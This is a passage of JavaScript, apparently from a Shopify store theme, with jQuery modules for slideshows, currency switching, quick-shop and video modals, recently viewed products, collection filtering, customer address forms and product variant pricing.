                var $slideshow = this.$slideshow;

                $slideshow.find('.slick-slide').each(function(index, el) {
                    var $slide = jQuery(el);
                    if ($slide.hasClass('slick-cloned')) {
                        var slideId = $slide.data('id');
                        var $slideImg = $slide.find('.hero__image').removeClass('lazyloading').addClass('lazyloaded');

                        // Get inline style attribute from non-cloned slide with arbitrary timeout
                        // so the image is loaded
                        setTimeout(function() {
                            var loadedImageStyle = $slideshow.find('.slideshow__slide--' + slideId + ':not(.slick-cloned) .hero__image').attr('style');

                            if (loadedImageStyle) {
                                $slideImg.attr('style', loadedImageStyle);
                            }

                        }, this.settings.autoplaySpeed / 1.5);

                    }
                }.bind(this));
            }
        });

        return slideshow;
    })();

    theme.announcementBar = (function() {
        var slideCount = 0;
        var compact = false;
        var defaults = {
            accessibility: true,
            arrows: false,
            dots: false,
            autoplay: true,
            autoplaySpeed: 5000,
            touchThreshold: 20,
            slidesToShow: 1
        };
        var $slider;

        function init() {
            $slider = jQuery('#AnnouncementSlider');
            if (!$slider.length) {
                return;
            }

            slideCount = $slider.data('block-count');
            compact = $slider.data('compact-style');

            var desktopOptions = $.extend({}, defaults, {
                slidesToShow: compact ? 1 : slideCount,
                slidesToScroll: 1
            });

            var mobileOptions = $.extend({}, defaults, {
                slidesToShow: 1
            });

            if (theme.config.bpSmall) {
                initSlider($slider, mobileOptions);
            } else {
                initSlider($slider, desktopOptions);
            }

            jQuery('body').on('matchSmall', function() {
                initSlider($slider, mobileOptions);
            }.bind(this));

            jQuery('body').on('matchLarge', function() {
                initSlider($slider, desktopOptions);
            }.bind(this));
        }

        function initSlider($slider, args) {
            if (isInitialized($slider)) {
                $slider.slick('unslick');
            }
            $slider.slick(args);
        }

        function isInitialized($slider) {
            return $slider.length && $slider.hasClass('slick-initialized');
        }

        // Go to slide if selected in the editor
        function onBlockSelect(id) {
            var $slide = jQuery('#AnnouncementSlide-' + id);
            if ($slider.length) {
                $slider.slick('slickPause');
            }
            if ($slide.length) {
                $slider.slick('slickGoTo', $slide.data('index'));
            }
        }

        function onBlockDeselect(id) {
            if ($slider.length && isInitialized($slider)) {
                $slider.slick('slickPlay');
            }
        }

        function unload() {
            if (isInitialized($slider)) {
                $slider.slick('unslick');
            }
        }

        return {
            init: init,
            onBlockSelect: onBlockSelect,
            onBlockDeselect: onBlockDeselect,
            unload: unload
        };
    })();

    theme.currencySwitcher = (function() {

        var selectors = {
            dataDiv: '#CurrencyData',
            picker: '.currency-input'
        };

        var data = {};

        function init() {
            var $dataDiv = jQuery(selectors.dataDiv);

            if (!$dataDiv.length) {
                return;
            }

            $primaryPicker = jQuery('#CurrencyPicker-header');
            $drawerPicker = jQuery('#CurrencyPicker-drawer');

            // Keep all currency pickers in sync
            $primaryPicker.on('change', function() {
                $drawerPicker.val(jQuery(this).val());
            });

            $drawerPicker.on('change', function() {
                $primaryPicker.val(jQuery(this).val());
            });

            data = {
                currency: $dataDiv.data('shop-currency'),
                default: $dataDiv.data('default-currency'),
                format: $dataDiv.data('format'),
                moneyFormat: $dataDiv.data('money-format'),
                moneyCurrencyFormat: $dataDiv.data('money-currency-format')
            };

            Currency.format = data.format;

            // Rely on the shop's currency format, not Shopify defaults (in case merchant changes it)
            Currency.money_format[data.currency] = data.moneyFormat;
            Currency.money_with_currency_format[data.currency] = data.moneyCurrencyFormat;

            // Fix for customer account page
            jQuery('span.money span.money').each(function() {
                jQuery(this).parents('span.money').removeClass('money');
            });

            // Save current price
            jQuery('span.money').each(function() {
                jQuery(this).attr('data-currency-' + data.currency, jQuery(this).html());
            });

            checkCookie();

            jQuery(selectors.picker).val(Currency.currentCurrency).on('change', refresh);
        }

        function syncPickers() {

        }

        function refresh() {
            var newCurrency = jQuery(selectors.picker).val();
            Currency.convertAll(Currency.currentCurrency, newCurrency);
        }

        function ajaxrefresh() {
            var newCurrency = jQuery(selectors.picker).val();
            // Ajax cart always returns shop's currency, not what theme settings defines
            Currency.convertAll(data.currency, newCurrency);
        }

        function checkCookie() {
            var cookieCurrency = Currency.cookie.read();

            if (cookieCurrency == null) {
                if (data.currency !== data.default) {
                    Currency.convertAll(data.currency, data.default);
                }
                else {
                    Currency.currentCurrency = data.default;
                }
            } else if (jQuery(selectors.picker).length && jQuery(selectors.picker).find('option[value=' + cookieCurrency + ']').length === 0) {
                // If the cookie value does not correspond to any value in the currency dropdown
                Currency.currentCurrency = data.currency;
                Currency.cookie.write(data.currency);
            }
            else if (cookieCurrency === data.currency) {
                Currency.currentCurrency = data.currency;
            }
            else {
                Currency.convertAll(data.currency, cookieCurrency);
            }
        }

        return {
            init: init,
            refresh: refresh,
            ajaxrefresh: ajaxrefresh
        };
    })();

    theme.initQuickShop = function(reinit) {
        var ids = [];
        var $buttons = jQuery('.quick-product__btn');

        $buttons.each(function() {
            var id = jQuery(this).data('product-id');
            var modalId = 'QuickShopModal-' + id;
            var name = 'quick-modal-' + id;

            // If another identical modal exists, remove duplicates
            if (ids.indexOf(id) > -1) {
                jQuery('.modal--quick-shop[data-product-id="'+ id +'"]').each(function(i) {
                    if (i > 0) {
                        jQuery(this).remove();
                    }
                });
                return;
            }

            new theme.Modals(modalId, name);
            ids.push(id);
        });
    };

    theme.videoModal = function() {
        var videoModalPlayer = null;
        var videoOptions = {
            width: 1280,
            height: 720,
            playerVars: {
                autohide: 0,
                autoplay: 1,
                branding: 0,
                cc_load_policy: 0,
                fs: 0,
                iv_load_policy: 3,
                modestbranding: 1,
                playsinline: 1,
                quality: 'hd720',
                rel: 0,
                showinfo: 0,
                wmode: 'opaque'
            }
        };

        var selectors = {
            triggers: 'a[href*="youtube.com/watch"], a[href*="youtu.be/"]'
        };

        if (!jQuery(selectors.triggers).length) {
            return;
        }

        var modal = new theme.Modals('VideoModal', 'video-modal', {
            closeOffContentClick: true,
            solid: true
        });

        jQuery(selectors.triggers).on('click', triggerYouTubeModal);

        function triggerYouTubeModal(evt) {
            evt.preventDefault();
            window.loadYouTube();

            if (theme.config.youTubeReady) {
                startVideoOnClick(evt);
            } else {
                jQuery('body').on('youTubeReady', function() {
                    startVideoOnClick(evt);
                });
            }
        }

        function startVideoOnClick(evt) {
            var $el = jQuery(evt.target);

            // get video ID from URL
            var videoId = getYoutubeVideoId($el.attr('href'));

            var args = $.extend({}, videoOptions, {
                videoId: videoId
            });

            // Disable plays inline on mobile
            args.playerVars.playsinline = theme.config.bpSmall ? 0 : 1;

            var videoModalPlayer = new YT.Player('VideoHolder', args);
            modal.open();

            jQuery('body').on('modalClose.VideoModal', function() {
                // Slight timeout so it is destroyed after the modal closes
                setTimeout(function() {
                    videoModalPlayer.destroy();
                }, 500); // modal close css transition
            });
        }

        function getYoutubeVideoId(url) {
            var regExp = /^.*((youtu.be\/)|(v\/)|(\/u\/\w\/)|(embed\/)|(watch\?))\??v?=?([^#\&\?]*).*/;
            var match = url.match(regExp);
            return (match&&match[7].length==11)? match[7] : false;
        }
    };


    theme.RecentlyViewed = (function() {
        var selectors = {
            template: '#RecentlyViewedProduct',
            outputContainer: '#RecentlyViewed-'
        };

        var init = false;

        function RecentlyViewed(container) {
            var $container = this.$container = jQuery(container);
            var sectionId = this.sectionId = $container.attr('data-section-id');
            this.namespace = '.recently-viewed' + sectionId;

            if (!jQuery(selectors.template).length) {
                return;
            }

            // Lazyload API
            this.checkVisibility();
            jQuery(window).on('scroll' + this.namespace, $.throttle(200, this.checkVisibility.bind(this)));
        };

        RecentlyViewed.prototype = $.extend({}, RecentlyViewed.prototype, {
            init: function() {
                if (init) {
                    return;
                }

                init = true;

                if ($.isEmptyObject(theme.recentlyViewed.recent)) {
                    // No previous history on page load, so bail
                    return;
                }

                this.outputContainer = jQuery(selectors.outputContainer + this.sectionId);
                this.handle = this.$container.attr('data-product-handle');

                // Request new product info via JS API
                var promises = [];
                for (handle in theme.recentlyViewed.recent) {
                    promises.push(this.getProductInfo(handle));
                }

                Promise.all(promises).then(function(result) {
                    this.setupOutput(result);
                    this.captureProductDetails(result);
                }.bind(this), function(error) {
                    console.log('Theme | recently viewed products failed to load');
                    console.log(error);
                });
            },

            checkVisibility: function() {
                if (theme.isElementVisible(this.$container, 600)) {
                    this.init();
                    jQuery(window).off('scroll' + this.namespace);
                }
            },

            getProductInfo: function(handle) {
                return new Promise(function(resolve, reject) {
                    if (theme.recentlyViewed.productInfo.hasOwnProperty(handle)) {
                        resolve(theme.recentlyViewed.productInfo[handle]);
                    } else {
                        jQuery.getJSON('/products/'+ handle +'.js', function(product) {
                            resolve(product);
                        });
                    }
                });
            },

            setupOutput: function(products) {
                var allProducts = [];
                var data = {};
                var limit = this.$container.attr('data-recent-count');

                var i = 0;
                for (key in products) {
                    var product = products[key];
                    // Ignore current product
                    if (product.handle === this.handle) {
                        continue;
                    }

                    i++;

                    // New or formatted properties
                    product.url_formatted = theme.recentlyViewed.recent[product.handle] ? theme.recentlyViewed.recent[product.handle].url : product.url;
                    product.image_responsive_url = theme.recentlyViewed.recent[product.handle].featuredImage;
                    product.image_aspect_ratio = theme.recentlyViewed.recent[product.handle].aspectRatio;
                    product.on_sale = product.compare_at_price > product.price;
                    product.sold_out = !product.available;
                    product.price_formatted = theme.Currency.formatMoney(product.price, theme.settings.moneyFormat);
                    product.compare_at_price_formatted = theme.Currency.formatMoney(product.compare_at_price, theme.settings.moneyFormat);
                    product.price_min_formatted = theme.Currency.formatMoney(product.price_min, theme.settings.moneyFormat);
                    product.money_saved = theme.Currency.formatMoney((product.compare_at_price - product.price), theme.settings.moneyFormat);

                    allProducts.unshift(product);
                }

                data = {
                    items: allProducts.slice(0, limit),
                    grid_item_width: this.$container.attr('data-grid-item-class')
                };

                if (allProducts.length === 0) {
                    return;
                }

                // Prep handlebars template
                var source = jQuery(selectors.template).html();
                var template = Handlebars.compile(source);
                this.outputContainer.append(template(data));

                if (AOS) {
                    AOS.refreshHard();
                }
            },

            captureProductDetails: function(products) {
                for (var i = 0; i < products.length; i++) {
                    var product = products[i];
                    theme.recentlyViewed.productInfo[product.handle] = product;
                }

                // Add data to session storage to reduce API requests later
                if (theme.config.hasSessionStorage) {
                    sessionStorage.setItem('recent-products', JSON.stringify(theme.recentlyViewed.productInfo));
                }
            },

            onUnload: function() {
                init = false;
                jQuery('window').off(this.namespace);
            }
        });

        return RecentlyViewed;
    })();

    theme.parallaxSections = {};

    theme.Parallax = (function() {
        var speed = 7; // higher is slower

        function parallax(el, args) {
            this.$container = jQuery(el);
            this.namespace = args.namespace;

            if (!this.$container.length) {
                return;
            }

            if (args.desktopOnly) {
                this.desktopInit();
            } else {
                this.init(this.$container, args)
            }
        }

        parallax.prototype = $.extend({}, parallax.prototype, {
            init: function(desktopOnly) {
                var $window = this.$window = jQuery(window);
                var elTop = this.$container.offset().top;

                $window.on('scroll' + this.namespace, function(evt) {
                    var scrolled = $window.scrollTop();
                    var shiftDistance = (elTop - scrolled) / speed;
                    this.$container.css({
                        'transform': 'translate3d(0, ' + shiftDistance + 'px, 0)'
                    });
                }.bind(this));

                // Reinit on resize
                $window.on('resize' + this.namespace, $.debounce(350, function() {
                    $window.off(this.namespace);

                    if (desktopOnly) {
                        if (!theme.config.bpSmall) {
                            this.init(true);
                            return;
                        }
                    }

                    this.init();
                }.bind(this)));
            },

            desktopInit: function() {
                if (!theme.config.bpSmall) {
                    this.init(true);
                }

                jQuery('body').on('matchSmall', function() {
                    this.destroy();
                }.bind(this));

                jQuery('body').on('matchLarge', function() {
                    this.init(true);
                }.bind(this));
            },

            destroy: function() {
                this.$container.removeAttr('style');
                this.$window.off(this.namespace);
            }
        });

        return parallax;
    })();


    theme.collectionTemplate = (function() {
        var isAnimating = false;

        var selectors = {
            collectionGrid: '.grid--collection',
            sidebar: '#CollectionSidebar',
            tags: '.tag-list a',
            removeTag: '.tag--remove a'
        };

        var settings = {
            combineTags: jQuery(selectors.sidebar).data('combine-tags')
        };

        var classes = {
            activeTag: 'tag--active'
        };

        function init() {
            // Ajax pagination
            jQuery(window).on('popstate', function(state) {
                if (state) {
                    getNewCollectionContent(location.href);
                }
            });

            initTagClicks();
        }

        function initTagClicks() {
            jQuery('body').on('click', selectors.tags, function(evt) {
                if (theme.FilterDrawer) {
                    theme.FilterDrawer.close();
                }

                if (jQuery(this).hasClass('no-ajax')) {
                    return;
                }

                evt.preventDefault();
                if (isAnimating) {
                    return;
                }

                isAnimating = true;

                var $el = jQuery(evt.currentTarget);
                var $parent = $el.parent();
                var newUrl = $el.attr('href');

                if (settings.combineTags) {
                    if ($parent.hasClass(classes.activeTag)) {
                        $parent.removeClass(classes.activeTag);
                    } else {
                        $parent.addClass(classes.activeTag);
                    }
                } else {
                    jQuery(selectors.tags).parent().removeClass(classes.activeTag);
                    $parent.addClass(classes.activeTag);
                }

                updateScroll(true);

                history.pushState({}, '', newUrl);
                jQuery(selectors.collectionGrid).addClass('unload');
                getNewCollectionContent(newUrl);
            });

            // Immediately remove the remove tag button before ajax kicks in
            jQuery('body').on('click', selectors.removeTag, function() {
                jQuery(this).parent('li').remove();
            });
        }

        function updateScroll(animate) {
            var scrollTo;
            if (theme.config.bpSmall) {
                scrollTo = jQuery('.collection-filter').offset().top - 10;
            } else {
                scrollTo = jQuery('#CollectionAjaxResult').offset().top + 1;
            }

            if (theme.config.stickyHeader) {
                var heightOfStickyNav = jQuery('.site-header').outerHeight(true);
                scrollTo = scrollTo - heightOfStickyNav;
            }

            if (animate) {
                jQuery('html, body').animate({ scrollTop: scrollTo }, 300);
            } else {
                jQuery('html, body').scrollTop(scrollTo);
            }
        }

        function getNewCollectionContent(url) {
            jQuery('#CollectionAjaxResult').load(url + ' #CollectionAjaxContent', function() {
                isAnimating = false;
                theme.reinitSection('collection-template');
                theme.collectionTemplate.reinit();
            }.bind(this));
        }

        function reinit() {
            settings.combineTags = jQuery(selectors.sidebar).data('combine-tags');

            updateScroll(false);
            initTagClicks();

            AOS.refreshHard();

            // Setup page transition classes
            theme.pageTransitions();

            // Reload quick shop buttons
            theme.initQuickShop(true);

            // Reload products inside each quick shop
            sections.register('product-template', theme.Product);
        }

        return {
            init: init,
            reinit: reinit
        };
    })();

    theme.customerTemplates = (function() {

        function initEventListeners() {
            // Show reset password form
            jQuery('#RecoverPassword').on('click', function(evt) {
                evt.preventDefault();
                toggleRecoverPasswordForm();
            });

            // Hide reset password form
            jQuery('#HideRecoverPasswordLink').on('click', function(evt) {
                evt.preventDefault();
                toggleRecoverPasswordForm();
            });
        }

        /**
         *
         *  Show/Hide recover password form
         *
         */
        function toggleRecoverPasswordForm() {
            jQuery('#RecoverPasswordForm').toggleClass('hide');
            jQuery('#CustomerLoginForm').toggleClass('hide');
        }

        /**
         *
         *  Show reset password success message
         *
         */
        function resetPasswordSuccess() {
            var $formState = jQuery('.reset-password-success');

            // check if reset password form was successfully submitted
            if (!$formState.length) {
                return;
            }

            // show success message
            jQuery('#ResetSuccess').removeClass('hide');
        }

        /**
         *
         *  Show/hide customer address forms
         *
         */
        function customerAddressForm() {
            var $newAddressForm = jQuery('#AddressNewForm');
            var $addressForms = jQuery('.js-address-form');

            if (!$newAddressForm.length || !$addressForms.length) {
                return;
            }

            if (Shopify) {
                jQuery('.js-address-country').each(function() {
                    var $container = jQuery(this);
                    var countryId = $container.data('country-id');
                    var provinceId = $container.data('province-id');
                    var provinceContainerId = $container.data('province-container-id');

                    new Shopify.CountryProvinceSelector(
                        countryId,
                        provinceId,
                        {
                            hideElement: provinceContainerId
                        }
                    );
                });
            }

            // Toggle new/edit address forms
            jQuery('.address-new-toggle').on('click', function() {
                $newAddressForm.toggleClass('hide');
            });

            jQuery('.address-edit-toggle').on('click', function() {
                var formId = jQuery(this).data('form-id');
                jQuery('#EditAddress_' + formId).toggleClass('hide');
            });

            jQuery('.address-delete').on('click', function() {
                var $el = jQuery(this);
                var formId = $el.data('form-id');
                var confirmMessage = $el.data('confirm-message');

                if (confirm(confirmMessage || 'Are you sure you wish to delete this address?')) {
                    Shopify.postLink('/account/addresses/' + formId, {parameters: {_method: 'delete'}});
                }
            });
        }

        /**
         *
         *  Check URL for reset password hash
         *
         */
        function checkUrlHash() {
            var hash = window.location.hash;

            // Allow deep linking to recover password form
            if (hash === '#recover') {
                toggleRecoverPasswordForm();
            }
        }

        return {
            init: function() {
                checkUrlHash();
                initEventListeners();
                resetPasswordSuccess();
                customerAddressForm();
            }
        };
    })();


    theme.Product = (function() {

        var classes = {
            onSale: 'on-sale',
            disabled: 'disabled',
            isModal: 'is-modal',
            loading: 'loading',
            loaded: 'loaded',
            interactable: 'video-interactable',
            zoomInit: 'photo-zoom-init'
        };

        var selectors = {
            productVideo: '.product__video',
            videoParent: '.product__video-wrapper',
            currentSlide: '.slick-current',
            zoomImage: '.photo-zoom-link__initial'
        };

        var youtubeReady;
        var videos = {};
        var youtubePlayers = [];
        var youtubeVideoOptions = {
            height: '480',
            width: '850',
            playerVars :{
                autohide: 0,
                autoplay: 1,
                branding: 0,
                cc_load_policy: 0,
                controls: 0,
                fs: 0,
                iv_load_policy: 3,
                modestbranding: 1,
                playsinline: 1,
                quality: 'hd720',
                rel: 0,
                showinfo: 0,
                wmode: 'opaque'
            },
            events: {
                onReady: onVideoPlayerReady,
                onStateChange: onVideoStateChange
            }
        };

        var vimeoReady;
        var vimeoPlayers = [];
        var vimeoVideoOptions = {
            byline: false,
            title: false,
            portrait: false,
            loop: true
        };

        function onVideoPlayerReady(evt) {
            var $player = evt.target.a ? jQuery(evt.target.a) : jQuery(evt.target.f);

            // FIX BY SM
            var videoId = evt.target.getVideoData().video_id;
            var $player = $('[data-video-id="'+videoId+'"]');
            if (!$player.length) { $player = $('[data-youtube-id="'+videoId+'"]') }
            // END FIX BY SM

            var playerId = $player.attr('id');
            youtubePlayers[playerId] = evt.target; // update stored player
            var player = youtubePlayers[playerId];

            setParentAsLoading($player);

            if (videos[playerId].style === 'muted') {
                youtubePlayers[playerId].mute().playVideo().pauseVideo();
            } else {
                setParentAsLoaded($player);
            }

            // If first slide or only photo, start video
            if ($player.closest(selectors.currentSlide).length || $player.data('image-count') === 1) {
                if (videos[playerId].style === 'muted') {
                    youtubePlayers[playerId].playVideo();
                    initCheckVisibility(playerId);
                }
            }
        }

        function initCheckVisibility(playerId) {
            // Add out of view pausing
            videoVisibilityCheck(playerId);
            jQuery(window).on('scroll.' + playerId, {id: playerId}, $.throttle(150, videoVisibilityCheck));
        }

        function videoVisibilityCheck(id) {
            var playerId;

            if (typeof id === 'string') {
                playerId = id;
            } else {
                // Data comes in as part of the scroll event
                playerId = id.data.id;
            }

            if (theme.isElementVisible(jQuery('#' + playerId))) {
                if (videos[playerId] && videos[playerId].style === 'unmuted') {
                    return;
                }
                playVisibleVideo(playerId);
            } else {
                pauseHiddenVideo(playerId);
            }
        }

        function playVisibleVideo(id) {
            if (youtubePlayers[id] && typeof youtubePlayers[id].playVideo === 'function') {
                youtubePlayers[id].playVideo();
            }
        }

        function pauseHiddenVideo(id) {
            if (youtubePlayers[id] && typeof youtubePlayers[id].pauseVideo === 'function') {
                youtubePlayers[id].pauseVideo();
            }
        }

        function onVideoStateChange(evt) {
            var $player = evt.target.a ? jQuery(evt.target.a) : jQuery(evt.target.f);

            // FIX BY SM
            var videoId = evt.target.getVideoData().video_id;
            var $player = $('[data-video-id="'+videoId+'"]');
            if (!$player.length) { $player = $('[data-youtube-id="'+videoId+'"]') }
            // END FIX BY SM

            var playerId = $player.attr('id');
            var player = youtubePlayers[playerId];

            switch (evt.data) {
                case -1: // unstarted
                    // Handle low power state on iOS by checking if
                    // video is reset to unplayed after attempting to buffer
                    if (videos[playerId].attemptedToPlay) {
                        setParentAsLoaded($player);
                        setVideoToBeInteractedWith($player);
                    }
                    break;
                case 0: // ended
                    player.playVideo();
                    break;
                case 1: // playing
                    setParentAsLoaded($player);
                    break;
                case 3: // buffering
                    videos[playerId].attemptedToPlay = true;
                    break;
            }
        }

        function setParentAsLoading($el) {
            $el
                .closest(selectors.videoParent)
                .addClass(classes.loading);
        }

        function setParentAsLoaded($el) {
            $el
                .closest(selectors.videoParent)
                .removeClass(classes.loading)
                .addClass(classes.loaded);
        }

        function setVideoToBeInteractedWith($el) {
            $el
                .closest(selectors.videoParent)
                .addClass(classes.interactable);
        }

        function Product(container) {
            var $container = this.$container = jQuery(container);
            var sectionId = this.sectionId = $container.attr('data-section-id');

            this.inModal = $container.closest('.modal').length;
            this.$modal;

            this.settings = {
                enableHistoryState: $container.data('enable-history-state') || false,
                namespace: '.product-' + sectionId,
                zoom: $container.data('image-zoom') || false,
                inventory: $container.data('inventory') || false,
                modalInit: false,
                lazyLoadModalContent: $container.data('lazyload-content') || false,
                slickMainInitialized: false,
                slickThumbInitialized: false,
                hasImages: true,
                hasMultipleImages: false,
                imageSize: '620x'
            };

            // Overwrite some settings when loaded in modal
            if (this.inModal) {
                this.settings.enableHistoryState = false;
                this.settings.namespace = '.product-' + sectionId + '-modal';
                this.$modal = jQuery('#QuickShopModal-' + sectionId);
            }

            this.selectors = {
                productJson: 'ProductJson-' + sectionId,

                video: 'ProductVideo-' + sectionId,
                photoThumbs: '.product__thumb-' + sectionId,
                thumbSlider: '#ProductThumbs-' + sectionId,
                mainSlider: '#ProductPhotos-' + sectionId,
                productImageMain: '.product-image-main--' + sectionId,

                priceWrapper: '.product__price-wrap-' + sectionId,
                price: '#ProductPrice-' + sectionId,
                comparePrice: '#ComparePrice-' + sectionId,
                priceContainer: '.sm--main-price',
                trainingPriceContainer: '.sm--training-price',
                savePrice: '#SavePrice-' + sectionId,
                priceA11y: '#PriceA11y-' + sectionId,
                comparePriceA11y: '#ComparePriceA11y-' + sectionId,
                sku: '#Sku-' + sectionId,
                inventory: '#ProductInventory-' + sectionId,

                addToCart: '#AddToCart-' + sectionId,
                addToCartText: '#AddToCartText-' + sectionId,

                originalSelectorId: '#ProductSelect-' + sectionId,
                singleOptionSelector: '.variant__input-' + sectionId,
                variantColorSwatch: '.variant__input--color-swatch-' + sectionId,

                modalFormHolder: '#ProductFormHolder-' + sectionId,
                formContainer: '#AddToCartForm-' + sectionId,
            };

            if (!jQuery('#' + this.selectors.productJson).html()) {
                return;
            }

            this.productObject = JSON.parse(document.getElementById(this.selectors.productJson).innerHTML);

            this.$mainSlider = jQuery(this.selectors.mainSlider);
            this.$thumbSlider = jQuery(this.selectors.thumbSlider);
            this.$firstProductImage = this.$mainSlider.find('img').first();

            if (!this.$firstProductImage.length) {
                this.settings.hasImages = false;
            }

            this.init();
        }

        Product.prototype = $.extend({}, Product.prototype, {
            init: function() {
                if (this.inModal) {
                    this.$container.addClass(classes.isModal);
                    jQuery('body').on('modalOpen.QuickShopModal-' + this.sectionId, this.openModalProduct.bind(this));
                    jQuery('body').on('modalClose.QuickShopModal-' + this.sectionId, this.closeModalProduct.bind(this));
                }

                if (!this.inModal) {
                    this.stringOverrides();
                    this.formSetup();
                    this.productSetup();

                    this.checkIfVideos();
                    this.createImageCarousels();

                    // Add product id to recently viewed array
                    this.addIdToRecentlyViewed();
                }
            },

            formSetup: function() {
                this.initQtySelector();
                this.initAjaxProductForm();
                this.initVariants();
            },

            productSetup: function() {
                this.setImageSizes();
                this.initImageSwitch();
            },

            addIdToRecentlyViewed: function() {
                var handle = this.$container.attr('data-product-handle');
                var url = this.$container.attr('data-product-url');
                var aspectRatio = this.$container.attr('data-aspect-ratio');
                var featuredImage = this.$container.attr('data-img-url');

                // Remove current product if already in set of recent
                if (theme.recentlyViewed.recent.hasOwnProperty(handle)) {
                    delete theme.recentlyViewed.recent[handle];
                }

                // Add it back to the end
                theme.recentlyViewed.recent[handle] = {
                    url: url,
                    aspectRatio: aspectRatio,
                    featuredImage: featuredImage
                };

                $.cookie('theme-recent', JSON.stringify(theme.recentlyViewed.recent), { path: '/', expires: 10000 });
            },

            stringOverrides: function() {
                theme.productStrings = theme.productStrings || {};
                $.extend(theme.strings, theme.productStrings);
            },

            setImageSizes: function() {
                if (!this.settings.hasImages) {
                    return;
                }

                // Get srcset image src, works on most modern browsers
                // otherwise defaults to settings.imageSize
                var currentImage = this.$firstProductImage[0].currentSrc;

                if (currentImage) {
                    this.settings.imageSize = theme.Images.imageSize(currentImage);
                }

                if (this.settings.zoom) {
                    this.settings.imageZoomSize = theme.Images.imageSize(this.$firstProductImage.parent().data('zoom-size'));
                }
            },

            initVariants: function() {
                var options = {
                    $container: this.$container,
                    enableHistoryState: this.settings.enableHistoryState,
                    singleOptionSelector: this.selectors.singleOptionSelector,
                    originalSelectorId: this.selectors.originalSelectorId,
                    product: this.productObject
                };

                if (jQuery(this.selectors.variantColorSwatch).length) {
                    jQuery(this.selectors.variantColorSwatch).on('change', function(evt) {
                        var $el = jQuery(evt.currentTarget);
                        var color = $el.data('color-name');
                        var index = $el.data('color-index');
                        this.updateColorName(color, index);
                    }.bind(this));
                }

                this.variants = new slate.Variants(options);
                this.$container.on('variantChange' + this.settings.namespace, this.updateCartButton.bind(this));
                this.$container.on('variantImageChange' + this.settings.namespace, this.updateVariantImage.bind(this));
                this.$container.on('variantPriceChange' + this.settings.namespace, this.updatePrice.bind(this));
                if (jQuery(this.selectors.sku).length) {
                    this.$container.on('variantSKUChange' + this.settings.namespace, this.updateSku.bind(this));
                }
                if (this.settings.inventory) {
                    this.$container.on('variantChange' + this.settings.namespace, this.updateInventory.bind(this));
                }
            },

            // Variant change functions
            updateColorName: function(color, index) {
                // Updates on radio button change, not variant.js
                jQuery('#VariantColorLabel-' + this.sectionId + '-' + index).text(color);
            },

            updateCartButton: function(evt) {
                var variant = evt.variant;

                if (variant) {
                    if (variant.available) {
                        // Available, enable the submit button and change text
                        jQuery(this.selectors.addToCart).removeClass(classes.disabled).prop('disabled', false);
                        jQuery(this.selectors.addToCartText).html(theme.strings.addToCart);
                    } else {
                        // Sold out, disable the submit button and change text
                        jQuery(this.selectors.addToCart).addClass(classes.disabled).prop('disabled', true);
                        jQuery(this.selectors.addToCartText).html(theme.strings.soldOut);
                    }
                } else {
                    // The variant doesn't exist, disable submit button
                    jQuery(this.selectors.addToCart).addClass(classes.disabled).prop('disabled', true);
                    jQuery(this.selectors.addToCartText).html(theme.strings.unavailable);
                }
            },

            updatePrice: function(evt) {

                var variant = evt.variant;

                if (variant) {

                    // Regular price
                    if(jQuery(this.selectors.trainingPriceContainer).length > 0) {
                        jQuery(this.selectors.price).html('<span class="sm--training-system">' + variant.title.split(' - ')[1] + '</span> ' + theme.Currency.formatMoney(variant.price, theme.settings.moneyFormat)).show();
                    } else {
                        jQuery(this.selectors.price).html(theme.Currency.formatMoney(variant.price, theme.settings.moneyFormat)).show();
                    }

                    // Sale price, if necessary
                    if (variant.compare_at_price > variant.price) {

                        // Changed BY SM
                        jQuery(this.selectors.priceContainer).html(theme.Currency.formatMoney(variant.price, theme.settings.moneyFormat));

                        jQuery(this.selectors.comparePrice).html(theme.Currency.formatMoney(variant.compare_at_price, theme.settings.moneyFormat));
                        jQuery(this.selectors.priceWrapper).removeClass('hide');
                        jQuery(this.selectors.price).addClass(classes.onSale);
                        jQuery(this.selectors.comparePriceA11y).attr('aria-hidden', 'false');
                        jQuery(this.selectors.priceA11y).attr('aria-hidden', 'false');

                        var savings = variant.compare_at_price - variant.price;
                        jQuery(this.selectors.savePrice)
                            .removeClass('hide')
                            .html(theme.strings.savePrice.replace('[saved_amount]', theme.Currency.formatMoney(savings, theme.settings.moneyFormat)));
                    } else {
                        jQuery(this.selectors.priceWrapper).addClass('hide');
                        jQuery(this.selectors.price).removeClass(classes.onSale);
                        jQuery(this.selectors.comparePriceA11y).attr('aria-hidden', 'true');
                        jQuery(this.selectors.priceA11y).attr('aria-hidden', 'true');
                        jQuery(this.selectors.savePrice).addClass('hide')
                    }

                    if (jQuery('body').hasClass('currencies-enabled')) {
                        theme.currencySwitcher.ajaxrefresh();
                    }
                }
            },

            updateSku: function(evt) {
                var variant = evt.variant;
                var newSku = '';

                if (variant) {
                    if (variant.sku) {
                        newSku = variant.sku;
                    }

                    jQuery(this.selectors.sku).html(newSku);
                }
            },

            updateInventory: function(evt) {
                var variant = evt.variant;
                var showInventory = false;
                var quantity = 0;
                var $inventoryLabel = jQuery(this.selectors.inventory);

                if (variant && variant.inventory_management === 'shopify') {
                    showInventory = true;
                    quantity = window.inventories[this.sectionId][variant.id];

                    if (quantity === 0 || quantity > 10) {
                        showInventory = false;
                    }
                }

                if (!showInventory) {
                    $inventoryLabel.addClass('hide');
                } else {
                    $inventoryLabel
                        .removeClass('hide')
                        .text(theme.strings.stockLabel.replace('[count]', quantity));
                }
            },

            updateVariantImage: function(evt) {
                var variant = evt.variant;
                var sizedImgUrl = theme.Images.getSizedImageUrl(variant.featured_image.src, this.settings.imageSize);
                var zoomSizedImgUrl;

                if (this.settings.zoom) {
                    zoomSizedImgUrl = theme.Images.getSizedImageUrl(variant.featured_image.src, this.settings.imageZoomSize);
                }

                var $newImage = jQuery('.product__thumb[data-id="' + variant.featured_image.id + '"]');
                var imageIndex = this._slideIndex($newImage.closest('.product__thumb-item'));

                // If there is no index, slider is not initalized
                if (typeof imageIndex === 'undefined') {
                    return;
                }

                this.$mainSlider.slick('slickGoTo', imageIndex);
            },

            // Image/thumbnail toggling
            initImageSwitch: function() {
                if (!jQuery(this.selectors.photoThumbs).length) {
                    return;
                }

                var self = this;

                jQuery(this.selectors.photoThumbs).on('click', function(evt) {
                    evt.preventDefault();
                });
            },

            checkIfVideos: function() {
                var $productVideos = this.$mainSlider.find(selectors.productVideo);

                // Stop if there are 0 videos
                if (!$productVideos.length) {
                    return false;
                }

                var videoTypes = [];

                $productVideos.each(function() {
                    var type = jQuery(this).data('video-type');

                    if (videoTypes.indexOf(type) < 0) {
                        videoTypes.push(type);
                    }
                });

                // Load YouTube API if not already loaded
